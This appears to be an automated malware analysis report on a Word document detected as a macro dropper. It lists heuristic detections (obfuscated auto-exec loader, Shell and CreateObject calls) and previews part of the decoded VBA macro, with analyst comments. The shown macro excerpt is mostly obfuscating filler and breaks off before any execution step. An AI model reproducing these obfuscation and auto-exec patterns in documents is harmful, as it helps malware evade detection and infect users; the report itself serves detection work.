MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an Office document containing heavily obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() and CreateObject() calls, typical for dropper malware. The ClamAV signature 'Doc.Dropper.Emodldr-6755244-0' further confirms its malicious nature as a dropper. The VBA code's obfuscation and use of execution functions suggest it aims to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Obfuscated auto-exec VBA loader — critical — OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This particular URL is the standard OOXML DrawingML XML namespace identifier, so on its own it is schema boilerplate rather than a download location.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 200385 bytes |
| SHA-256: 7291c1a37b8882672a1db7fc36f5566a67f0e39e8d48a81d3858874b38649b44 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ---------------------------------------------------------------------------
' Analyst note (comments added to the report preview only; the carved
' macros.bas artifact is unchanged — see its SHA-256 in the artifact table).
'
' hVVtiN is a padding routine. Every statement in this Sub assigns the result
' of a pure built-in expression (UCase, Right, Left, LTrim, RTrim, Space,
' StrReverse, concatenation of string literals, integer arithmetic on
' constants) to a name that is never read anywhere in this Sub, and the
' Integer parameter wtgYCOe is never referenced. No Shell(), CreateObject()
' or other side-effecting call appears here, so the execution sinks the
' heuristics report (OLE_VBA_SHELL, OLE_VBA_CREATEOBJ) presumably live
' elsewhere in the macro, outside this preview. None of the variables is
' declared in this Sub (no Dim, and no Option Explicit is visible), so they
' are presumably module-level or implicitly created Variants — confirm
' against the full extracted source before treating any literal below as an
' indicator; as far as this Sub shows, the strings are never consumed.
' ---------------------------------------------------------------------------
Private Sub hVVtiN(wtgYCOe As Integer)
WSZEsctD = UCase("V%F^ml&B& gU*")
' The same names receive integers and strings in turn (e.g. xhpkYAptvFPW
' gets an integer here and Space(5) a few lines later), which only works for
' untyped (Variant) variables — consistent with generated filler code.
xhpkYAptvFPW = 932 + 1950 + 1983
NnEDrffBnyH = 1844 + 449 + 1641
ywHLDxqy = 1939 + 1798 + 248
FsUHBVaNHY = Right("h)sYPxHj?WA%G", 2)
pIYJgQMpYGe = 771 - 986 - 1185
WSZEsctD = Space(3)
nhXOWQuC = 1719 - 879 - 1306
vCzipFxNacux = 431 - 1311 - 1680
xhpkYAptvFPW = Space(5)
XdosBdFbyhu = LTrim("pXwpOvYszdm@nqc]")
pIYJgQMpYGe = "ez#GWL #F#wKPOCPj" + "Sny-^c%q!Z@P^qLZ" + "Q)wTaVoubqPB(C"
XdosBdFbyhu = StrReverse("R[ZDLIi-M*DtAtT-LT")
nhXOWQuC = "W*fjqqHXSvcK$REp" + "K)$R?KVrnPn?M(Ap$" + "ZPEfrotwjkm"
YQplfTwadid = "BOTm-!T_](l?#G!ZCUR" + "w(hYs@wDrTZP?RAi" + "^WStWzxVCT@dB"
ywHLDxqy = Right("Btqf*X!Jf]uFbw^v", 4)
lkbAnuwnqeV = Space(7)
pIYJgQMpYGe = RTrim(")WzGLWFCl?O#E%_)")
vfYeu = UCase("kTIIXoehWWWok^UDo_")
lkbAnuwnqeV = 994 + 1327 + 1665
WSZEsctD = "i#L_xW(.vhEmJ?fE#" + "yhS$b%iEjJQz%DhUk%J" + "vKyCG*c!kdU?Ct_LI"
NnEDrffBnyH = UCase("ty auB HowJ!")
xhpkYAptvFPW = 759 - 1403 - 923
YQplfTwadid = StrReverse("m#DGtSL.Z)_zomg")
lkbAnuwnqeV = StrReverse("JYeFYfH^trM")
NnEDrffBnyH = UCase("VsyNlh)bqFx")
xhpkYAptvFPW = Space(1)
pIYJgQMpYGe = LTrim("n((du-YMFQcC*zp")
FsUHBVaNHY = 324 + 889 + 824
' Last assignment is also unread within this Sub; the routine returns
' without any observable effect beyond these variable writes.
hxUeXKb = "_auZFK*TEtQfmjwP" + "P$ib FDLBq%[k" + "FZNImbvJxSHmK?m.["
End Sub
Private Sub Document_Open()
hxUeXKb = Right("rT]JEpEFaARyMgX", 2)
vCzipFxNacux = Right("tDguf^ZCVi&)Va.fP [", 5)
vfYeu = 802 + 597 + 500
xhpkYAptvFPW = RTrim("hIZmPPw)[ZYI-fD")
lkbAnuwnqeV = LTrim("-wPCERhP b %ek_?X!")
vfYeu = "Cx$M@o(QGEB" + "q&JhEEUpsukaxg^iI*u" + "w TRB[UUtl"
WSZEsctD = 905 + 1886 + 1078
YQplfTwadid = 742 + 1386 + 1757
NnEDrffBnyH = Right("Pq*$Bzt!blP", 3)
GfSOiNavP = 188 + 1836 + 337
XdosBdFbyhu = Space(15)
WSZEsctD = Space(2)
For FqqqXc = 0 To 1
For sSqHvZ = 0 To 10
pIYJgQMpYGe = LTrim("Q_wjl@dC)u")
nhXOWQuC = StrReverse("Q.AL$x#[Bv_aK*Az[@^C")
ywHLDxqy = "(&uxBIdCI[twA" + "Em(leOaJnIqLWuDpUl" + "@*.x]%u[VTT"
lkbAnuwnqeV = Left(")OadH-drUjv&n ?Ivd", 5)
xhpkYAptvFPW = Right("b )MTt_sk[EmKKEWr", 2)
NnEDrffBnyH = Left("!eCmhhy^Ki N[zUEkNV", 4)
vCzipFxNacux = Left("^F?%t%zE!vX$h!?", 4)
nhXOWQuC = RTrim("YZ.RSkV^cCq[@")
xhpkYAptvFPW = ")oOiXy^& ^.gaSpNut&" + "LrAzdC#()kwa" + "@ AhXahtOl?"
Next sSqHvZ
NnEDrffBnyH = 1825 + 1115 + 1079
NnEDrffBnyH = 574 - 850 - 1485
vCzipFxNacux = Right("ZR@dGakvuy", 2)
WSZEsctD = 238 - 1738 - 1120
ywHLDxqy = RTrim("^(W%nZ#XBiQfI")
Next FqqqXc
hxUeXKb = Right("s_[#tgZtiqRQ%&eQrFS", 4)
YQplfTwadid = Right("I@De$y)vUVlHo)", 4)
XdosBdFbyhu = StrReverse("rIuwMt]% -[@t_fWgcG@")
NnEDrffBnyH = Space(16)
While rfbFTC < 1
For rfZqhS = 0 To 10
vfYeu = 193 + 659 + 1012
hxUeXKb = 125 - 1434 - 1988
vfYeu = LTrim("CVeB@buP&e")
NnEDrffBnyH = Left("jQ iNEGN(rqTYgbZtD@", 5)
XdosBdFbyhu = Right("MK)J@uuGdq?ln ", 2)
NnEDrffBnyH = Right("qWdj@?(synAj-", 3)
Next rfZqhS
GfSOiNavP = RTrim("U@Qe$IKSlbXnT]z&cg")
pIYJgQMpYGe = StrReverse("uMmejxl&wb V$R#C?GB ")
hxUeXKb = 1986 - 1071 - 830
nhXOWQuC = LTrim("IUPMf@^zxQG")
WSZEsctD = LTrim("ZnUm$yVgXRSYOB^Wzsj")
FsUHBVaNHY = LTrim(" wSF%K.KyF)at$_")
hxUeXKb = 667 + 567 + 1009
GfSOiNavP = Right("gFqJrQKV_tOAd#d$nD", 2)
rfbFTC = rfbFTC + 3
Wend
XdosBdFbyhu = Left("K&[fUar-o$Ue!o", 4)
NnEDrffBnyH = 1216 - 1451 - 351
YQplfTwadid
... (truncated)